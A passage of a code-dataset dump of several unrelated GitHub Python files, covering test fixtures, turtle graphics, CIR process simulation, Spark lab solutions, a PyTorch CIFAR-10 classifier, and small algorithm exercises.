3: {\"abs\": True},\n 4: {\"cat\": int_short_cat},\n 5: {\"cat\": int_short_cat, \"frac_nan\": 0.1},\n 6: {\"cat\": str_short_cat, \"frac_nan\": 0.1},\n }\n)\ndf_test[14] = lambda x: make_test_df(\n ds={\"freq\": x},\n cols={\n \"y\": {},\n 0: {},\n 1: {\"frac_nan\": 0.1},\n 2: {\"frac_nan\": 1},\n 3: {\"abs\": True},\n 4: {\"cat\": int_short_cat},\n 5: {\"cat\": int_short_cat, \"frac_nan\": 0.1},\n 6: {\"cat\": str_short_cat, \"frac_nan\": 0.1},\n 7: {\"cat\": str_long_cat},\n 8: {\"cat\": int_long_cat},\n 9: {\"cat\": str_long_cat, \"frac_nan\": 0.1},\n 10: {\"cat\": int_long_cat, \"frac_nan\": 0.1},\n 11: {\"cat\": [\"A\"]},\n 12: {\"cat\": [\"A\"], \"frac_nan\": 0.1},\n },\n)\ndf_test[15] = make_test_df(cols={\"y\": {\"cat\": [2]}})\ndf_test[16] = make_test_df(cols={\"y\": {\"cat\": [3]}})\ndf_test[17] = make_test_df(ds={}, cols={\"truth\": {}, \"forecast\": {}})\ndf_test[18] = make_test_df(ds={}, cols={\"truth\": {\"frac_nan\": 1}, \"forecast\": {\"frac_nan\": 1}})\ndf_test[19] = make_test_df(ds={\"freq\": \"W\"}, cols={\"truth\": {\"frac_nan\": 0.1}, \"forecast\": {}})\ndf_test[20] = make_test_df(ds={}, cols={\"y\": {}, \"regressor1\": {}, \"regressor2\": {\"cat\": [0, 1]}})\n","repo_name":"artefactory/streamlit_prophet","sub_path":"tests/samples/df.py","file_name":"df.py","file_ext":"py","file_size_in_byte":5428,"program_lang":"python","lang":"en","doc_type":"code","stars":225,"dataset":"github-code","pt":"40"} +{"seq_id":"39999940399","text":"import turtle\n\nrafa = turtle.Turtle()\nrafa.speed(0)\n\nfor i in range(360):\n\trafa.color(\"cyan\")\n\trafa.forward(400)\n\trafa.penup()\n\trafa.setposition(0,0)\n\trafa.pendown()\n\trafa.left(1)\n\nfor i in range(360):\n\trafa.color(\"blue\")\n\trafa.forward(150)\n\trafa.penup()\n\trafa.forward(150)\n\trafa.pendown()\n\trafa.forward(100)\n\trafa.penup()\n\trafa.setposition(0,0)\n\trafa.pendown()\n\trafa.left(1)\n\nfor i in range(360):\n\trafa.color(\"black\")\n\trafa.forward(100)\n\trafa.penup()\n\trafa.forward(250)\n\trafa.pendown()\n\trafa.forward(50)\n\trafa.penup()\n\trafa.setposition(0,0)\n\trafa.pendown()\n\trafa.left(1)\n\nturtle.done()","repo_name":"rafapoloni/Hello-World","sub_path":"turtle_05.py","file_name":"turtle_05.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24085139188","text":"import numpy as np\nimport os\nimport scipy.stats\nfrom numba import jit, njit\nfrom scipy.stats import gaussian_kde, kstest\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nfrom solvers import direct_simulation, implicit_scheme\nimport statsmodels.api as sm\nfrom scipy.stats import ncx2\nfrom scipy.stats import probplot\n\n\nclass MatlabRandn:\n\n def __init__(self):\n script_dir = os.path.dirname(os.path.realpath(__file__))\n self._randn = np.load(os.path.join(script_dir, \"../randn/randn.npy\"))\n self._index = 0\n\n def __call__(self, sz1, sz2=None):\n if sz2 is None:\n start = self._index\n end = self._index + sz1\n self._index = end\n return self._randn[start:end]\n else:\n start = self._index\n end = self._index + (sz1 * sz2)\n self._index = end\n return self._randn[start:end].reshape(sz2, sz1).T\n\n def reset(self):\n self._index = 0\n\n\ndef mc_mean(a, ci_width=0.95, axis=None):\n if axis is None:\n a = a.flatten()\n mc_mean = np.mean(a, axis=axis)\n quantile = scipy.stats.norm.ppf(1-(1-ci_width)/2)\n upper = mc_mean + quantile*np.std(a, axis=axis)/np.sqrt(a.shape[axis])\n lower = mc_mean - quantile*np.std(a, axis=axis)/np.sqrt(a.shape[axis])\n return mc_mean, lower, upper\n\n\ndef brownian_paths(T, N, M):\n dt = T/N\n dW = np.zeros((N+1, M))\n dW[1:,:] = np.random.normal(0, np.sqrt(dt), size=(N, M))\n W = np.cumsum(dW, axis=0) \n t = np.linspace(0, T, N+1)\n return t, W\n\n\ndef estimate_Sn(k, lamda, theta, X_0, scheme, T, n, M):\n t, W = brownian_paths(T, 2*n, M)\n t_n, X_n = scheme(k=k, lamda=lamda, theta=theta, X_0=X_0, t=t[::2], W=W[::2,:])\n t_2n, X_2n = scheme(k=k, lamda=lamda, theta=theta, X_0=X_0, t=t, W=W)\n S_n = np.mean(np.amax(np.abs(X_n - X_2n[::2,:]), axis=0))\n return S_n\n\n\ndef estimate_order(k, lamda, theta, X_0, scheme, T, n, M):\n t, W = brownian_paths(T, 2*n, M)\n t_n, X_n = scheme(k=k, lamda=lamda, theta=theta, X_0=X_0, t=t[::2], W=W[::2,:])\n t_2n, X_2n = scheme(k=k, lamda=lamda, theta=theta, X_0=X_0, t=t, W=W)\n S_n = np.mean(np.amax(np.abs(X_n - X_2n[::2,:]), axis=0))\n\n t_10, W_10 = brownian_paths(T, 20*n, M)\n t_10n, X_10n = scheme(k=k, lamda=lamda, theta=theta, X_0=X_0, t=t_10[::2], W=W_10[::2,:])\n t_20n, X_20n = scheme(k=k, lamda=lamda, theta=theta, X_0=X_0, t=t_10, W=W_10)\n S_10n = np.mean(np.amax(np.abs(X_10n - X_20n[::2,:]), axis=0))\n return np.log10(S_n) - np.log10(S_10n) #, np.log10(S_n), np.log10(S_10n)\n\n\ndef plot_distribution(k, lamda, theta, X_0, scheme, T, N_set, M, legend=False):\n colors = cm.rainbow(np.linspace(0, 1, len(N_set)))[::-1]\n for i, n in enumerate(N_set):\n t, W = brownian_paths(T, int(n), M)\n t, X_sim = scheme(k, lamda, theta, X_0, t, W)\n\n x = np.linspace(0, 5, 100)\n kde_sim = gaussian_kde(X_sim[-1,:])\n plt.plot(x, kde_sim(x), color=colors[i], label=str(n))\n\n X_T = np.zeros(M)\n for i in range(M):\n _, X_dist = direct_simulation(k, lamda, theta, X_0, T, 1)\n X_T[i] = X_dist[1]\n \n kde_dist = gaussian_kde(X_T)\n\n plt.plot(x, kde_dist(x), \"--\", label=\"True\", color=\"black\", linewidth=2)\n if legend:\n plt.legend()\n\n\ndef cir_bond_price(k, lamda, theta, X_t, T):\n t = 0\n h = np.sqrt(k**2 + 2*theta**2)\n A = ((2*h*np.exp((k+h)*(T-t)/2))/(2*h+(k+h)*(np.exp((T-t)*h)-1)))**(2*k*lamda/theta**2)\n B = (2*(np.exp((T-t)*h)-1))/(2*h+(k+h)*(np.exp((T-t)*h)-1))\n return A*np.exp(-B*X_t)\n\n\ndef price_derivative(k, lamda, theta, X_0, T, N, M, payoff):\n t, W = brownian_paths(T, N, M)\n _, X = implicit_scheme(k, lamda, theta, X_0, t, W)\n X_int = np.sum(X, axis=0)*(T/N)\n val = np.exp(-X_int) * payoff(X[-1])\n mc_mean = np.mean(val)\n sd = np.std(val)\n return mc_mean, mc_mean - 1.96*sd/np.sqrt(M), mc_mean + 1.96*sd/np.sqrt(M)\n\n\ndef show_probplot(k, lamda, theta, X_0, T, simulated):\n c = (2*k)/((1-np.exp(-k*T))*theta**2)\n df = 4*k*lamda/theta**2\n nc = 2*c*X_0*np.exp(-k*T)\n rv = ncx2(df, nc, scale=1/(2*c))\n x, y = probplot(simulated, dist = rv, fit=False)\n plt.plot(x, y, \"bo\")\n plt.title(\"Probability Plot\")\n plt.xlabel(\"Theoretical quantiles\")\n plt.ylabel(\"Ordered Values\")\n x = np.linspace(min(x[0], y[0]), max(x[-1], y[-1]), 2)\n plt.plot(x, x, \"k--\")\n plt.gca().set_aspect(\"equal\")\n\n \ndef show_qqplot(k, lamda, theta, X_0, T, simulated):\n c = (2*k)/((1-np.exp(-k*T))*theta**2)\n df = 4*k*lamda/theta**2\n nc = 2*c*X_0*np.exp(-k*T)\n pp = sm.ProbPlot(simulated, ncx2, distargs=(df,nc), scale=1/(2*c))\n x = pp.theoretical_quantiles\n y = pp.sample_quantiles\n \n plt.plot(x, y, \"bo\")\n plt.title(\"Probability Plot\")\n plt.xlabel(\"Theoretical quantiles\")\n plt.ylabel(\"Sample quantiles\")\n x = np.linspace(min(x[0], y[0]), max(x[-1], y[-1]), 2)\n plt.plot(x, x, \"k--\")\n plt.gca().set_aspect(\"equal\")\n\n\ndef perform_kstest(k, lamda, theta, X_0, T, simulated):\n c = (2*k)/((1-np.exp(-k*T))*theta**2)\n df = 4*k*lamda/theta**2\n nc = 2*c*X_0*np.exp(-k*T)\n rv = ncx2(df, nc, scale=1/(2*c))\n\n cdf = lambda x: rv.cdf(x)\n return kstest(simulated, cdf=cdf)\n\n\ndef correlated_paths(T, N, M, cor):\n dt = T/N\n dW1 = np.zeros((N+1, M))\n dW2 = np.zeros((N+1, M))\n dW1[1:,:] = np.random.normal(0, np.sqrt(dt), size=(N, M))\n W1 = np.cumsum(dW1, axis=0) \n dW2[1:,:] = cor * dW1[1:,:] + np.random.normal(0, np.sqrt(dt), size=(N, M)) * np.sqrt(1-cor**2)\n W2 = np.cumsum(dW2, axis=0) \n\n t = np.linspace(0, T, N+1)\n return t, W1, W2","repo_name":"tao-yu/cox-ingersoll-ross","sub_path":"sim/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9881584202","text":"#from hec.script import Plot\nfrom hec.heclib.dss import HecDss, DSSPathname\nimport csv\n \nclass csvfile:\n\n def __init__(self, filename):\n raw=list(csv.reader(open(filename)))\n self.column_names =raw[0] \n self.data = raw[1:]\n print(self.column_names)\n # print(self.data)\n\n def getString(self,rowIndex,column_name):\n colIndex = self.column_names.index(column_name)\n print(colIndex, column_name, pathname)\n return self.data[rowIndex][colIndex]\n\n def getFloat(self,rowIndex,column_name):\n s = self.getString(rowIndex,column_name)\n return float(s)\n\n def getInt(self,rowIndex,column_name):\n s = self.getString(rowIndex,column_name)\n return int(s)\n\n def size(self):\n return len(self.data)\n\n# begin main program\n# note: location info can be created when saving a specific timeseriescontainer\n# however, location info can't be modified as part of a timeseries container\n# because that location info is potentially shared with other containers\n\ncsv = csvfile(r\"D:/temp/DSS_SupInfo_location.csv\")\nfn =r\"C:/ProgramFiles/HEC/CWMS/CWMS_v3.2.3/CWMS-v3.2.3/common/grid/Chile/Chile_America_Santiago_SI.dss\"\ndss = HecDss.open(fn)\n\nfor i in range(0,csv.size()):\n pathname = csv.getString(i,\"\\xef\\xbb\\xbfpathname\")\n # print(pathname)\n dssPath = DSSPathname(pathname)\n dssPath.setDPart(\"\") # remove dates from pathname\n tsc=dss.get(dssPath.pathname())\n\n tsc.setLatLong(csv.getFloat(i,\"y\"),csv.getFloat(i,\"x\"))\n\n tsc.horizontalDatum = csv.getInt(i,\"xyDatum\")\n tsc.horizontalUnits = csv.getInt(i,\"xyUnits\")\n\n # tsc.setVerticalDatum(csv.getInt(i,\"zDatum\"))\n tsc.verticalDatum = csv.getInt(i,\"zDatum\")\n # tsc.setVerticalUnits(csv.getInt(i,\"zUnits\"))\n tsc.verticalUnits = csv.getInt(i,\"zUnits\")\n\n tsc.coordinateSystem = csv.getInt(i,\"coordSys\")\n tsc.coordinateID = csv.getInt(i,\"coordID\")\n\n tsc.locationTimezone = csv.getString(i,\"timeZone\")\n \n\n dss.put(tsc)\n print('\\n')\n\nprint('\\nDone!\\n')","repo_name":"HydrologicEngineeringCenter/DSSVue-Example-Scripts","sub_path":"src/locationInfo/DSS_SupInfo_set-location-info_expanded.py","file_name":"DSS_SupInfo_set-location-info_expanded.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"30799766636","text":"# solutions.py\n\nimport pyspark\nfrom pyspark.sql import SparkSession\nimport numpy as np\nimport numpy.linalg as la\nimport matplotlib.pyplot as plt\nfrom pyspark.ml import Pipeline\nfrom pyspark.ml.feature import VectorAssembler, StringIndexer, OneHotEncoder\nfrom pyspark.ml.tuning import ParamGridBuilder, TrainValidationSplit\nfrom pyspark.ml.classification import RandomForestClassifier\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator as MCE\n\n\n\n# --------------------- Resilient Distributed Datasets --------------------- #\n\n### Problem 1\ndef word_count(filename='huck_finn.txt'):\n \"\"\"\n A function that counts the number of occurrences unique occurrences of each\n word. Sorts the words by count in descending order.\n Parameters:\n filename (str): filename or path to a text file\n Returns:\n word_counts (list): list of (word, count) pairs for the 20 most used words\n \"\"\" \n #initialize SparkSession object:\n spark = SparkSession\\\n .builder\\\n .appName(\"app_name\")\\\n .getOrCreate()\n \n #load file in as PySpark RDD:\n huck_finn = spark.sparkContext.textFile(\"huck_finn.txt\") \n \n #count number of occurences of each word:\n words = huck_finn.flatMap(lambda row: row.split()) #do flat map so that each word is on one row (its own row, one word per row) so that can count num of words easily\n #split gets each word by itself in a row\n words = words.map(lambda row: (row,1)) #mapping func applies a function to each row of our RDD, it makes it so we have a tuple of (word, 1)\n #do 1 because then can start counting the word at 1, call it on words bc want to do this with the split words\n \n words = words.reduceByKey(lambda x, y:x + y) #this looks @ RDD as a dict\n #if finds 2 keys that are the same: it will add the values together and increase the count of the word by 1 so this actually gets the word count\n \n #sort words by descending order:\n answer = list(words.sortBy(lambda row: -1*row[1]).collect()[:20]) #sort words in descending order and get the 1st 20 words, convert it to list\n \n spark.stop() #need to end the spark session\n \n return answer\n \n### Problem 2\ndef monte_carlo(n=10**5, parts=6):\n \"\"\"\n Runs a Monte Carlo simulation to estimate the value of pi.\n Parameters:\n n (int): number of sample points per partition\n parts (int): number of partitions\n Returns:\n pi_est (float): estimated value of pi\n \"\"\"\n #first need to initialize SparkSession object:\n spark = SparkSession\\\n .builder\\\n .appName(\"app_name\")\\\n .getOrCreate()\n \n #create RDD w/ n*parts parameter amount of sample pts and partition it with parts parameter:\n #need to sample uniformly: np.random.random lets us sample from 0 to 1\n #multiplying it by 2 stretches the intervalto [0,2] so subtract off 1 to shift it to left 1 and be on interval [-1,1] like want to w/ uniform distrib.\n #the tuple w/ n*parts, 2 says have n*parts number of rows and the 2 creates a tuple like (x,y) pts\n samp_pts = spark.sparkContext.parallelize(2 * np.random.random((n*parts, 2)) - 1, parts) #Jake Murphy from state farm expained this to me, thanks Jake!\n \n #use .filter and a lambda function to check if points are inside unit circle or not (their sum is less than or equal to radius, which is 1 here)\n samp_pts = samp_pts.filter(lambda samp_pt: samp_pt[0]**2 + samp_pt[1]**2 <= 1) #sample_point[0] is x, sample_point[1] is y\n \n #calculate percentage of pts w/in circle\n perc_inside = samp_pts.count() / (n*parts) #.count returns num of elements in the RDD\n \n spark.stop() #need to end the spark session\n \n return perc_inside*4 #told in problem that multiplying perc of pts w/in circle by 4 gives us estimate for area of circle and thus estimate for pi\n \n# ------------------------------- DataFrames ------------------------------- #\n\n### Problem 3\ndef titanic_df(filename='titanic.csv'):\n \"\"\"\n Calculates some statistics from the titanic data.\n \n Returns: the number of women on-board, the number of men on-board,\n the survival rate of women, \n and the survival rate of men in that order.\n \"\"\"\n #initialize spark object first:\n spark = SparkSession\\\n .builder\\\n .appName(\"app_name\")\\\n .getOrCreate()\n \n #load file into pyspark dataframe:\n titanic = spark.read.csv(filename)\n \n #find num of women on board:\n num_women = titanic.filter(titanic._c3 == \"female\").count() #column _c3 has sex of passengers so filter, count only by women \n \n #find num of men on board:\n num_men = titanic.filter(titanic._c3 == \"male\").count() #filter, count sex column by men\n \n #find survival rate of women:\n women_survived = titanic.filter(titanic._c0 == 1).filter(titanic._c3 == \"female\").count() #_c0 col says whether survivied or not: 1 means survived\n w_survivial_rate = women_survived / num_women \n \n #find survival rate of men:\n men_survived = titanic.filter(titanic._c0 == 1).filter(titanic._c3 == \"male\").count()\n m_survivial_rate = men_survived / num_men \n \n spark.stop() \n \n #return each 4 values in order given as tuple of floats:\n return ((num_women, num_men, w_survivial_rate, m_survivial_rate))\n \n### Problem 4\ndef crime_and_income(crimefile='london_crime_by_lsoa.csv',\n incomefile='london_income_by_borough.csv', major_cat='Robbery'):\n \"\"\"\n Explores crime by borough and income for the specified major_cat\n Parameters:\n crimefile (str): path to csv file containing crime dataset\n incomefile (str): path to csv file containing income dataset\n major_cat (str): major or general crime category to analyze\n returns:\n numpy array: borough names sorted by percent months with crime, descending\n \"\"\"\n #create spark object:\n spark = SparkSession\\\n .builder\\\n .appName(\"app_name\")\\\n .getOrCreate()\n \n #load 2 files in as pyspark dataframes:\n crime_df = spark.read.csv(crimefile, header = True, inferSchema = True)\n income_df = spark.read.csv(incomefile, header = True, inferSchema = True)\n \n #only care about the crime specified in major_cat parameter so want to filter crime_df to only have that one crime in major_category column\n crime_df = crime_df.filter(crime_df.major_category == major_cat)\n \n #only want one row for each borough, but crime_df has multiple so need to use groupBy on it to fix this\n groups = crime_df.groupBy(\"borough\").sum(\"value\") #want to groupby boroughs, but want to get the total number of major_cat crimes that happened in each borough\n #value column counts how many of the crimes occured so sum over that column for each borough this gives us table\n #with 1 row for each borough and a column with the total major_cat crimes for each \n \n #now are able to join our 2 dataframes on the borough column (but be careful: want to join w/ groups now instead of crime_df)\n new_df = groups.join(income_df, on = \"borough\") #joining on borough will make it so that have 1 row for each borough\n new_df = new_df.drop(\"mean-08-16\") #get rid of this thing, no one wants it!\n \n #order by total num of crimes for major_cat, descending:\n new_df = new_df.orderBy(\"sum(value)\", ascending = False)\n \n new_df = new_df.withColumnRenamed(\"sum(value)\", \"major_cat_total_crime\") #rename the column name to more accurately represent what it is\n \n data_array = np.array(new_df.collect()) #convert dataframe to numpy array\n \n #create scatter plot of number of major_cat_crimes by median income for each borough\n plt.scatter(data_array[:,1].astype(float), data_array[:,2].astype(float), color = \"deeppink\")\n plt.xlabel(\"Number of major_cat Crimes\", color = \"mediumvioletred\")\n plt.ylabel(\"Median Income for Each Borough\", color = \"mediumvioletred\")\n plt.title(\"Number of major_cat Crimes By Median Income for Each Borough\", color = \"mediumvioletred\")\n plt.show()\n \n spark.stop()\n \n return data_array\n \n### Problem 5\ndef titanic_classifier(filename='titanic.csv'):\n \"\"\"\n Implements a classifier model to predict who survived the Titanic.\n Parameters:\n filename (str): path to the dataset\n Returns:\n metrics (tuple): a tuple of metrics gauging the performance of the model\n ('accuracy', 'weightedRecall', 'weightedPrecision')\n \"\"\"\n #create spark object:\n spark = SparkSession\\\n .builder\\\n .appName(\"app_name\")\\\n .getOrCreate()\n \n #load 2 files in as pyspark dataframes:\n schema = ('survived INT, pclass INT, name STRING, sex STRING, age FLOAT, sibsp INT, parch INT, fare FLOAT')\n titanic = spark.read.csv(filename, schema = schema)\n \n #use pyspark.ml package to train classifier: doing the same exact thing as the ex given above the problem but want to outperform LogisticRegression so use RFClass instead is the only change make\n \n #prepare data by converting the 'sex' column to binary categorical variable\n sex_binary = StringIndexer(inputCol='sex', outputCol='sex_binary')\n \n onehot = OneHotEncoder(inputCols=['pclass'], outputCols=['pclass_onehot']) #one-hot-encode pclass (Spark automatically drops a column)\n \n features = ['sex_binary', 'pclass_onehot', 'age', 'sibsp', 'parch', 'fare'] #create single features column\n features_col = VectorAssembler(inputCols=features, outputCol='features')\n \n #now we create a transformation pipeline to apply the operations above\n #this is very similar to the pipeline ecosystem in sklearn\n pipeline = Pipeline(stages=[sex_binary, onehot, features_col])\n titanic = pipeline.fit(titanic).transform(titanic)\n \n titanic = titanic.drop('pclass', 'name', 'sex') #drop unnecessary columns for cleaner display (note the new columns)\n \n train, test = titanic.randomSplit([0.75, 0.25], seed=11) #split into train/test sets (75/25)\n \n #now do RandomForestClassification instead of LogisiticRegression:\n rf = RandomForestClassifier(labelCol='survived', featuresCol='features')\n \n #run a train-validation-split to fit best elastic net param\n #ParamGridBuilder constructs a grid of parameters to search over\n #have different hyperparameters for RF than for LR so this is another change that need to make too\n paramGrid = ParamGridBuilder()\\\n .addGrid(rf.maxBins, [5, 3, 12]).build()\n \n #TrainValidationSplit will try all combinations and determine best model using the evaluator (see also CrossValidator)\n tvs = TrainValidationSplit(estimator=rf,\n estimatorParamMaps=paramGrid,\n evaluator=MCE(labelCol='survived'),\n trainRatio=0.75,\n seed=11)\n \n #train the classifier by fitting our tvs object to the training data\n clf = tvs.fit(train)\n \n #use the best fit model to evaluate the test data\n results = clf.bestModel.evaluate(test)\n \n accuracy = results.accuracy\n weightedRecall = results.weightedRecall\n weightedPrecision = results.weightedPrecision\n \n spark.stop()\n \n return ((accuracy, weightedRecall, weightedPrecision))\n \n #Jake Murphy pulled me through this lab. Big props to him\n \nif __name__ == '__main__':\n \n #test prob 1:\n #print(word_count(filename='huck_finn.txt'))\n \n #test prob 2:\n #print(monte_carlo(n=10**5, parts=6))\n \n #test prob 3:\n #print(titanic_df(filename = 'titanic.csv'))\n \n #test prob 4:\n #print(crime_and_income(crimefile='london_crime_by_lsoa.csv', incomefile='london_income_by_borough.csv', major_cat='Robbery'))\n \n #test prob 5:\n #print(titanic_classifier(filename='titanic.csv'))\n \n pass\n","repo_name":"janeslagle/ACME-Senior-Year-Labs","sub_path":"spark.py","file_name":"spark.py","file_ext":"py","file_size_in_byte":12314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29851197231","text":"n=int(input())\nif n<0:\n q=-n\nelse:\n q=n\ns=[int(i) for i in str(q)]\nfor i in range(len(s)):\n if s[-1]==0:\n s.remove(0)\nm=s[::-1]\nk=''.join([str(i) for i in m])\nif n>0:\n print(int(k))\nelse:\n print(-int(k))","repo_name":"kalyankol/codemind-python","sub_path":"Reverse_Integer.py","file_name":"Reverse_Integer.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70933939321","text":"# @Author: Administrator\n# @Date: 2019-09-09 13:40:28\n# @Last Modified by: Administrator\n# @Last Modified time: 2019-09-10 22:20:48\n\n# -*- coding: utf-8 -*-\n\n# 先将cifar-10数据集转成train和test\n\nimport pickle as p\nimport numpy as np\nimport os\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\n\nroot_path = 'd:/_python/神经网络数据集/CIFAR-10'\nos.chdir(root_path)\n\n# 原来的tensor是三个维度的,值在0到1之间,那么经过transforms.Normalize之后就到了-1到1区间\n# x = (x-mean)/std 也就是((0,1)-0.5)/0.5=(-1,1)\ntransform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n\n# 在构建数据集的时候指定transform,就会应用我们定义好的transform\n# root是存储数据的文件夹,download=True指定如果数据不存在先下载数据\ncifar_train = torchvision.datasets.CIFAR10(root='./', train=True,\n download=False, transform=transform)\ncifar_test = torchvision.datasets.CIFAR10(root='./', train=False,\n download=False,transform=transform)\n\n# 读取 trian 和 test 数据\ntrainloader = torch.utils.data.DataLoader(cifar_train, batch_size=32, shuffle=True)\ntestloader = torch.utils.data.DataLoader(cifar_test, batch_size=32, shuffle=True)\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n# 定义神经网络\nclass LeNet(nn.Module):\n # 一般在__init__中定义网络需要的操作算子,比如卷积、全连接算子等等\n def __init__(self):\n # 这个语句是找到LeNet的父类即nn.Module,然后执行nn.Module的init方法\n # 相当于对实例LeNet执行nn.Module进行初始化方法\n super(LeNet, self).__init__()\n # Conv2d的第一个参数是输入的channel数量,第二个是输出的channel数量,第三个是kernel size\n self.conv1 = nn.Conv2d(3, 6, 5)\n self.conv2 = nn.Conv2d(6, 16, 5)\n # 由于上一层有16个channel输出,每个feature map大小为5*5,所以全连接层的输入是16*5*5\n self.fc1 = nn.Linear(16*5*5, 120)\n self.fc2 = nn.Linear(120, 84)\n # 最终有10类,所以最后一个全连接层输出数量是10\n self.fc3 = nn.Linear(84, 10)\n self.pool = nn.MaxPool2d(2, 2)\n # forward这个函数定义了前向传播的运算,只需要像写普通的python算数运算那样就可以了\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = self.pool(x)\n x = F.relu(self.conv2(x))\n x = self.pool(x)\n # 下面这步把二维特征图变为一维,这样全连接层才能处理\n x = x.view(-1, 16*5*5)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n# 实例化神经网络\nnet = LeNet()\n# 定义损失函数和优化器\n# optim中定义了各种各样的优化方法,包括SGD\nimport torch.optim as optim\n\n# CrossEntropyLoss就是我们需要的损失函数,optimizer就是优化器\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.9)\n\nprint(\"Start Training...\")\nfor epoch in range(30):\n # 我们用一个变量来记录每100个batch的平均loss\n loss100 = 0.0\n # 我们的dataloader派上了用场\n for i, data in enumerate(trainloader):\n inputs, labels = data\n # 首先要把梯度清零,不然PyTorch每次计算梯度会累加,不清零的话第二次算的梯度等于第一次加第二次的\n optimizer.zero_grad()\n # 计算前向传播的输出\n outputs = net(inputs)\n # 根据输出计算loss\n loss = criterion(outputs, labels)\n # 算完loss之后进行反向梯度传播,这个过程之后梯度会记录在变量中\n loss.backward()\n # 用计算的梯度对模型去做优化\n optimizer.step()\n loss100 += loss.item()\n if i % 100 == 99:\n print('[Epoch %d, Batch %5d] loss: %.3f' %\n (epoch + 1, i + 1, loss100 / 100))\n loss100 = 0.0\n\nprint(\"Done Training!\")\n\n\n# ok,训练完了之后我们来检测一下准确率,我们用训练好的模型来预测test数据集\n# 构造测试的dataloader\ndataiter = iter(testloader)\n# 预测正确的数量和总数量\ncorrect = 0\ntotal = 0\n# 使用torch.no_grad的话在前向传播中不记录梯度,节省内存\nwith torch.no_grad():\n for data in testloader:\n images, labels = data\n images, labels = images.to(device), labels.to(device)\n # 预测\n outputs = net(images)\n # 我们的网络输出的实际上是个概率分布,去最大概率的哪一项作为预测分类\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\nprint('Accuracy of the network on the 10000 test images: %d %%' % (\n 100 * correct / total))","repo_name":"fengmingshan/python","sub_path":"Pytroch_神经网络/pytroch_解决cifar-10图片分类问题.py","file_name":"pytroch_解决cifar-10图片分类问题.py","file_ext":"py","file_size_in_byte":5005,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"5463135303","text":"def lastStoneWeightII(self, stones):\n # stupid brain teaser: basically, you need to try all combinations...\n values = set([stones[0], -stones[0]])\n \n for x in stones[1:]:\n temp1 = {y+x for y in values}\n temp2 = {y-x for y in values}\n temp1.update(temp2)\n values = temp1\n \n return min([x for x in values if x >= 0])\n","repo_name":"bigw660/Algorithm-Practice","sub_path":"1049. Last Stone Weight II.py","file_name":"1049. Last Stone Weight II.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"41478025525","text":"import os\nimport sys\nimport pandas as pd\nfrom configs.main_config import config\n\n\ndef ensemble(config):\n experiment_path = os.path.join(config[\"experiment_folder\"])\n if not os.path.exists(experiment_path):\n sys.exit(\n \"Path {} does not exist. Please run prepare_data.py and dissect.py before.\".format(\n experiment_path\n )\n )\n\n i = 0\n for i in range(len(config[\"models\"])):\n df_curr = pd.read_table(\n os.path.join(\n config[\"experiment_folder\"], \"dissect_fractions_{}.txt\".format(i)\n ),\n index_col=0,\n )\n if i == 0:\n df_ens = df_curr\n else:\n df_ens = df_ens + df_curr\n df_ens = df_ens / len(config[\"models\"])\n savepath = os.path.join(config[\"experiment_folder\"], \"dissect_fractions_ens.txt\")\n print(\"Ensemble predictions are saved to {}\".format(savepath))\n df_ens.to_csv(savepath, sep=\"\\t\")\n\n\nif __name__ == \"__main__\":\n ensemble(config)\n","repo_name":"robinredX/DISSECT","sub_path":"ensemble.py","file_name":"ensemble.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"24714983799","text":"class Node:\r\n def __init__(self,val=0,next=None):\r\n self.val=val\r\n self.next=next\r\n\r\nclass MyLinkedList:\r\n\r\n def __init__(self):\r\n self.head=None\r\n self.length=0\r\n def get(self, index: int) -> int:\r\n if index<0 or index>self.length-1:\r\n return -1\r\n else:\r\n node=self.head\r\n if node:\r\n for i in range(index):\r\n node=node.next\r\n return node.val\r\n else:\r\n return -1\r\n def addAtHead(self, val: int) -> None:\r\n cur=Node(val,self.head)\r\n self.head=cur\r\n self.length+=1\r\n def addAtTail(self, val: int) -> None:\r\n cur=Node(val)\r\n node=self.head\r\n if node:\r\n for i in range(self.length-1):\r\n node=node.next\r\n node.next=cur\r\n else:\r\n self.head=cur\r\n self.length+=1\r\n def addAtIndex(self, index: int, val: int) -> None:\r\n cur=Node(val)\r\n if index<0 or index>self.length:\r\n return\r\n elif index==0:\r\n self.addAtHead(val)\r\n else:\r\n node=self.head\r\n if node:\r\n for i in range(index-1):\r\n node=node.next\r\n cur.next=node.next\r\n node.next=cur\r\n else:\r\n return\r\n self.length+=1\r\n def deleteAtIndex(self, index: int) -> None:\r\n if index<0 or index>self.length-1:\r\n return\r\n elif index==0:\r\n self.head=self.head.next\r\n else:\r\n node=self.head\r\n if node:\r\n for i in range(index-1):\r\n node=node.next\r\n node.next=node.next.next\r\n else:\r\n return\r\n self.length-=1\r\n# Your MyLinkedList object will be instantiated and called as such:\r\n# obj = MyLinkedList()\r\n# param_1 = obj.get(index)\r\n# obj.addAtHead(val)\r\n# 